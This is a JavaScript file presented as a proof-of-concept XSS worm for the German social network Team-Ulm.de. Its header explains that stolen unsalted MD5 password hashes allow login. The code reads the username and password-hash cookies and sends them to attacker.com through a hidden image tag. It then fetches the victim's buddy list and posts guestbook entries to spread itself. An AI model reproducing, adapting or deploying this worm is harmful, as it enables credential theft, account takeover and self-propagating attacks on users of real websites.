// Name: Zakoomy
// Author: Marcell 'SkyOut' Dietl
// Date: October 2008
// Website: http://marcell-dietl.de/
//
// Description: This code is a so called XSS Worm for the social networking
//              site Team-Ulm.de, which conists of about 350 000 users. The
//              interesting thing about this site is, that you are able to
//              get the MD5 hashed password of the user (not salted!).
//              Furthermore you can use this hashvalue to log in as this user,
//              no matter if his/her session is active or not!
//              It is a proof-of-concept code, that has to be modified slightly
//              to be really dangerous...

function readCookie(name)
{
   var nameEQ = name + "=";
   var ca = document.cookie.split(';');
   for(var i=0;i < ca.length;i++)
   {
      var c = ca[i];
      while (c.charAt(0)==' ') c = c.substring(1,c.length);
      if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
   }
   return null;
}

var u = readCookie('tu-login[user]');
var p = readCookie('tu-login[pwd]');

if (u != null && p != null) {
   document.write('<img src="http://attacker.com/cookie.php?u='+u+'&p='+p+'" style="border: 0px; width: 0px; height: 0px;"/>');
}

function sleep(ms)
{
	var zeit = (new Date()).getTime();
	var stoppZeit = zeit + ms;
	while((new Date()).getTime() < stoppZeit) {};
}

function buildxmlobject()
{
	var req = null;

	try
	{
		req = new XMLHttpRequest();
	}
	catch (ms)
	{
		try
		{
			req = new ActiveXObject("Msxml2.XMLHTTP");
		} 
		catch (nonms)
		{
			try
			{
				req = new ActiveXObject("Microsoft.XMLHTTP");
			} 
			catch (failed)
			{
				req = null;
			}
		}  
	}

	return req;

}

function creategbentry(id)
{

	str = "eintrag=<masked url here>&p_userid=" + id;
	xmlhttp2 = buildxmlobject();
	xmlhttp2.open("POST", "./p_saveguestposting.php", true);
	xmlhttp2.onreadystatechange = function()
	{
	}

	xmlhttp2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
	xmlhttp2.setRequestHeader('Content-Length', str.length);
	xmlhttp2.send(str);
}

xmlhttp1 = buildxmlobject();
xmlhttp1.open("GET", "./msg_buddy_admin.php", true);
xmlhttp1.onreadystatechange = function()
{
   if (xmlhttp1.readyState == 4 && xmlhttp1.status == 200)
   {
      msg_buddy_admin_source_code = xmlhttp1.responseText;
      
      var x = msg_buddy_admin_source_code.split("\n");

	for(var i = 0; i < x.length; i++)
	{
		if(x[i].indexOf("p_yourprofile.php?id=") != -1)
		{
			var id = x[i].substr(x[i].indexOf("?id=") + 4, 20);
			id = id.substr(0, id.indexOf("\""));

			creategbentry(id);
			sleep(20500);
		}
	}
   }
}

xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp1.send(null);